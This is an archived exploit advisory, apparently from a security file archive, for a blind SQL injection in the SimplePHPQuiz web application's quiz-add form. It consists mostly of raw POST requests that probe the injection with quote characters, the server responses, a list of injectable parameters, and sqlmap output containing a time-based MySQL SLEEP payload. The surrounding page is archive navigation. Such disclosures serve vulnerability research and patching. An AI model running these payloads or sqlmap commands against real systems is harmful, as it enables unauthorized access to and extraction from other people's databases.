SimplePHPQuiz Blind SQL Injection

SimplePHPQuiz Blind SQL Injection: Posted Aug 24, 2016; Authored by HaHwul; SimplePHPQuiz suffers from a remote blind SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | cf0515d4feeb9e73981e68b0f36f7a9643ae21e7ee948896683bff58c5703ee3; Download | Favorite | View

SimplePHPQuiz Blind SQL Injection

# Exploit Title: SimplePHPQuiz - Blind SQL Injection
# Date: 2016-08-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/valokafor/SimplePHPQuiz
# Software Link: https://github.com/valokafor/SimplePHPQuiz/archive/master.zip
# Version: [app version] (REQUIRED)
# Version: Latest commit
# Tested on: Debian [wheezy]


### Vulnerability
1-1. Nomal Request
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96

question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit

1-2 Response
   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
   <p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

2-1 Attack Request 1
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96

question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit

2-2 Response
    <div class="container theme-showcase" role="main"><h1>System Error</h1> <div class="footer">
   <p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

3-1 Attack Request 2
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96

question=0000''&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit

3-2 Response
   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
   <p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>


### Weak Parameters
correct_answer parameter
question parameter
wrong_answer1 parameter
wrong_answer2 parameter
wrong_answer3 parameter


### SQLMAP Result
#> sqlm -u "http://127.0.0.1/vul_test/SimplePHPQuiz/process_quizAdd.php" --data="question=0000&correct_answer=99aaa99&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit" --risk 3 --dbs --no-cast -p correct_answer

...snip...

POST parameter 'correct_answer' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 117 HTTP(s) requests:
---
Parameter: correct_answer (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: question=0000&correct_answer=99aaa99' AND (SELECT * FROM (SELECT(SLEEP(5)))FvVg) AND 'ZQRo'='ZQRo&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
---
[17:52:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

SimplePHPQuiz Blind SQL Injection

SimplePHPQuiz Blind SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SimplePHPQuiz Blind SQL Injection

Share This

SimplePHPQuiz Blind SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems